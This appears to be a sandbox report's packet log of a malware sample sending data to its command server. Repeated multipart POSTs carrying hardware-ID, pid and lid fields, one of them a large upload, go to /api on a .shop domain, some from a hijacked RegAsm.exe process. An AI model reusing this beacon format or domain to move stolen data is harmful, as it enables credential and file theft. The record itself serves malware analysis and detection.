2024-05-06 05:53:36 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	49776	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:38 UTC	292	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:38 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:38 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-05-06 05:53:39 UTC	824	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=64fqulqh9nfkfnosmsvmqo0crb; expires=Thu, 29-Aug-2024 23:40:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cybaQYUWGt4jIstVLtjIAdB7KQi7o6MvMzZUFByuVYkD2gShxWcIzlGJKa%2FFtgAo2Bqcb4PeXTjiCfsqHZ206RVM27RHMc3%2BjT9KeS%2FJHEbB54afKx6E%2BRUIT4xyDTxFSmYy1Yq6IWnM%2B9%2F%2FRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b6078c8002f1-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:39 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49778	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:40 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7079 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:40 UTC	7079	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:41 UTC	826	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4jnbohd65rhbdadls6uf46i35j; expires=Thu, 29-Aug-2024 23:40:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hxvx87Chz98uC6skKYy2LAR%2Fx%2F%2F%2B%2FKjkV0IRc4nWkQgv1dP%2FbMqBPBE21b4i4oduhd5Hv4hRyk31GCy4r%2FMcqB7MGIKWdfMDImm7G7T6BLPXkf9eaiEZLey5xyz1CyDyExtUEzmt%2BuZFqxtI9A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b6150b1a0a02-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49777	104.21.30.191	443	5856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:41 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:41 UTC	8779	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:41 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k0fk40roefpjee9eoaaf74trg4; expires=Thu, 29-Aug-2024 23:40:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rNJc3r4VOmrcbSrGB9UIPL2qmTQfPdbvw0sUp2U5Fyfi920ZLd6jd0lts0d8fkDDs2FptRLOwVUdbWUs1M9xgrK12Jg6dUCO9M8qlwDnaWqdhsJCfWuwwHOi5bVUbJGvQd7ouV6v%2FcgL5%2FMAsQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b6187f958df1-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49782	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:41 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1352 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:41 UTC	1352	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:42 UTC	818	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rdidjv01qpmhbtk9fsm75g1cn9; expires=Thu, 29-Aug-2024 23:40:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PU1KUKAXyUZouKp%2BL4SMnG7apakhTyLRIBzqL57sBk4IlVsI1VGgKZQX5Gem%2FmLekiR46I0JOCbBMDwWYuepgOvgSx7uICGWN%2FoQ7diYWGm2o4z2%2FhsodtIL9ALT9BqZrc7M0yTRaVZKaBNIpQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b61a3d885c67-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49784	104.21.30.191	443	5856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:42 UTC	292	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:42 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:42 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-05-06 05:53:42 UTC	816	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ccqk0409nokru9s6err18m4hu4; expires=Thu, 29-Aug-2024 23:40:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gr5xO579tZwMF66CsiUKDVbb29zCBowJIwngjmQY3n0FUZD6twb0kcM6QgIB4V6UDxes0zBC3dIdY5dWppJPgdud3vnIiBdaf02XlOPNd%2BvX6JGg2xRqUE5cKB6seQYjq6qVbRri6%2FW%2FucKm9g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b61f0841a4fa-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49786	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:42 UTC	293	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587207 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:42 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:42 UTC	15331	OUT	Data Raw: e0 06 b0 f0 cc 21 90 78 85 08 04 d7 f8 d9 39 8a 6b 01 26 3d e9 ec 9c e3 40 67 3d f1 7f 75 f5 bf 97 5a e0 5e dc 02 66 31 20 ca 98 9a ed 83 70 5a 41 b0 83 69 50 6d 84 c6 7a c4 b2 72 8e 7a ee 40 71 77 53 1e ec 0c 87 2b c2 8d 2e b4 d2 20 e6 61 a9 1e 02 b8 12 9f 62 e7 82 01 e6 f2 cb c7 8c 03 22 76 a4 d9 15 0b c9 a9 c0 d4 1d db 85 1a 34 ef cd 2f 89 41 2b df 8c 58 42 1d 52 ee f6 5c 28 7c f8 53 ec 9b c5 09 15 de a4 46 0c b5 c2 4c 56 7d 10 96 e9 2e 44 72 2a de 54 61 11 26 ff 3c 66 8e 92 b4 55 e7 e3 24 cf a9 b1 17 e6 92 56 e4 2b ba ff 49 3d 43 3f 24 44 26 d1 5a 51 54 fe 0d a9 95 4e 3f 58 6f 47 ee 7f 41 06 58 d8 eb 17 b4 b6 d5 29 ac d8 a2 fc a9 4f 28 0b 69 20 23 ac f1 86 1b db 1e 8a 05 43 f6 27 6a ca 54 ae 35 1a a7 51 29 6e e8 37 3b d4 a1 fa be b7 c3 4d e9 bb e5 f2 Data Ascii: !x9k&=@g=uZ^f1 pZAiPmzrz@qwS+. ab"v4/A+XBR\(\|SFLV}.Dr*Ta&<fU$V+I=C?$D&ZQTN?XoGAX)O(i #C'jT5Q)n7;M
2024-05-06 05:53:42 UTC	15331	OUT	Data Raw: 87 16 1c 50 4c 23 08 b9 ba 32 72 d5 d4 16 d4 e7 98 72 ec eb f3 1f e7 db 02 aa b0 09 55 47 b1 b0 e1 b3 c8 16 09 ba d8 9f 7a 8d 57 4e 5d 2b 36 c6 58 43 e4 1c 8f ac 6b 67 7e bc 2b de ca 5a 12 86 2d 4f 98 f4 80 46 2d 24 e0 c7 20 18 be 11 fd af 1f e3 c5 8a 64 de f0 a3 b7 9a a4 25 c8 7c d3 27 6a c1 01 0f 91 23 8d ac 37 44 22 d1 92 7f 9a 64 a5 a9 9d 5d 3e 33 af 60 cb 80 e9 98 07 15 bd b6 54 3d a8 53 e4 26 3f b5 3a 40 78 c1 7a d1 78 42 91 df 48 87 5f 7d 8f 59 c8 54 ab 13 37 5e 84 96 bc 43 c0 c4 56 99 db 6e 71 b7 82 a0 3e 6c de 9a 21 72 b5 19 84 02 5e ed af 0f ea e1 01 ee d8 3e 82 7a 4b 09 3e cf be 14 78 64 df a1 34 6f a6 cd 58 3e 0f e6 e3 77 4b cb 69 c6 7c 36 b4 cd 27 1d 7b 1e b4 39 18 bc 74 fb 9b d1 e4 40 fb 3a a3 d8 72 7f c7 39 96 24 3a 98 c8 db 57 cb 78 cc d7 Data Ascii: PL#2rrUGzWN]+6XCkg~+Z-OF-$ d%\|'j#7D"d]>3`T=S&?:@xzxBH_}YT7^CVnq>l!r^>zK>xd4oX>wKi\|6'{9t@:r9$:Wx
2024-05-06 05:53:42 UTC	15331	OUT	Data Raw: 05 b0 e8 c6 5c 82 28 fa ed fe 62 6c 7c c8 de fd c5 af 65 b6 9f 90 b1 03 0a f1 f1 8a 63 f5 5f 68 de 20 b7 92 83 06 b2 ab c3 f9 7a b6 6f 25 41 87 71 16 d7 07 96 9b 02 7f b1 24 ff 6d 80 72 76 cc 59 00 38 30 9a 67 a2 12 18 31 2a 13 92 cb 8d df f0 66 ea 4e 7d b1 42 3c b4 c0 0c 0c 1f 3c 73 16 df 9c 78 4d 14 ec 51 d8 be ef e3 07 fc dd 36 43 0f ab 9b 93 02 dc e2 e3 0d 3d 94 20 20 68 b6 db 88 2d 83 34 d9 b3 d4 de 49 68 05 05 59 6c d3 5d f2 c3 ea db 68 66 76 c9 cc 73 28 ec 77 ab 7d 82 7e 0b be 1a 0e a2 c8 d7 6c ef 3f e5 fc dd 6e bf ff da 63 7d 54 a3 ca f3 28 e9 c4 34 03 27 18 e4 04 ec 13 2c 30 f4 54 16 ea 54 8c de 3a ae 2d 56 e2 d6 d7 ab 8c 08 0d 12 78 68 db b8 37 f7 92 66 43 b2 f2 cc 13 b9 47 bb c1 a9 ae 6c bb da 80 47 17 13 7d 5e 9a 1d 58 90 06 bd 0f 3d 4d 10 33 Data Ascii: \(bl\|ec_h zo%Aq$mrvY80g1*fN}B<<sxMQ6C= h-4IhYl]hfvs(w}~l?nc}T(4',0TT:-Vxh7fCGlG}^X=M3
2024-05-06 05:53:42 UTC	15331	OUT	Data Raw: 8f 2c f5 3b bb 95 b5 25 34 1a 46 2d 3f e2 e3 8e d1 5c 7c 8b cb 24 4d f7 7e 56 d3 c8 b1 60 fb 95 5e d3 19 79 47 c7 2b cb 8b 2f 7c db 56 d3 19 6d 0f ad ee f6 26 3f ff 68 f4 b3 9c 87 94 76 db 7c b1 fa 83 ba b5 37 73 ee 44 96 45 d5 04 ab f6 ee 2e 69 0a 0b be a5 3e 9c 93 b2 2e a5 f0 c1 5a e1 b9 2b 86 e9 f7 02 62 23 eb 42 c0 f7 70 e8 fd 2b eb 08 da f2 42 97 16 7e 56 76 fb 87 ed 2f 1d 74 34 86 67 f1 ad 62 71 4d 57 2d 19 8d b7 3c 75 a5 7e 7a 0f 97 29 46 27 7d 90 ba 7b f0 f1 11 76 91 3f ec 4c 68 ae 05 c2 47 18 14 c0 6f 18 a9 82 5e a9 f4 63 c6 ee c2 76 87 00 e4 75 40 5c e4 3b ad 76 08 0d e8 e2 5b a5 89 c9 84 2b 92 0f bd 61 00 15 6f 4e 24 56 e4 fa e5 a2 63 4a e4 70 01 8a d3 5c 81 bd 9d a8 59 39 9f fe c3 3e e2 1d 20 fe e5 8a bf fc 41 d5 41 d4 de dd 81 3d 43 42 9f 90 Data Ascii: ,;%4F-?\\|$M~V`^yG+/\|Vm&?hv\|7sDE.i>.Z+b#Bp+B~Vv/t4gbqMW-<u~z)F'}{v?LhGo^cvu@\;v[+aoN$VcJp\Y9> AA=CB
2024-05-06 05:53:42 UTC	15331	OUT	Data Raw: 54 b5 50 b8 d2 f9 0d a4 16 e3 9d 45 ba eb 43 e4 bd 96 ce 1b d2 af 5f ad b7 15 05 cd 2d bc 7a 15 58 8e 15 56 5e 30 fc ba 6d 04 41 ad 10 44 16 b4 e9 b0 10 cf 6e b9 ab 86 0c 1b 44 f3 6e 3a e3 be e6 89 39 0b b4 1a 57 eb b1 ce 92 f0 7b 48 ab 05 4a 47 bf f8 c2 70 90 23 ef bd 3e 41 ba 6a 34 7b 52 8f 7e 21 1f 37 64 7b f3 b9 ed ce 61 69 46 32 9a 76 37 f7 03 69 34 b4 a8 1a 6a 94 50 63 d8 ce 34 fa e9 e1 4f 75 75 16 3f 0b c8 c3 1f 95 86 45 79 fe 2b c9 6d 35 a8 21 a3 28 b0 c1 ef 0c 11 fc c3 17 27 72 eb 03 2e 72 10 51 ca 0b 7e 89 36 32 43 6b 62 9b 67 4c 3e c9 41 89 35 ba ad ec b3 f4 0c 42 cc 12 5a 99 75 b6 2b b5 6c eb 8a 6b 8d 77 4c 31 5e e3 31 5f 06 f1 15 3d 1e 72 94 0d 2a bf 70 42 a2 3f 40 18 f7 d6 2f 76 69 ab 26 8a f2 e2 7b 86 c7 16 7e 7e 7c 43 91 8e 9e 0f f1 6c 29 Data Ascii: TPEC_-zXV^0mADnDn:9W{HJGp#>Aj4{R~!7d{aiF2v7i4jPc4Ouu?Ey+m5!('r.rQ~62CkbgL>A5BZu+lkwL1^1_=r*pB?@/vi&{~~\|Cl)
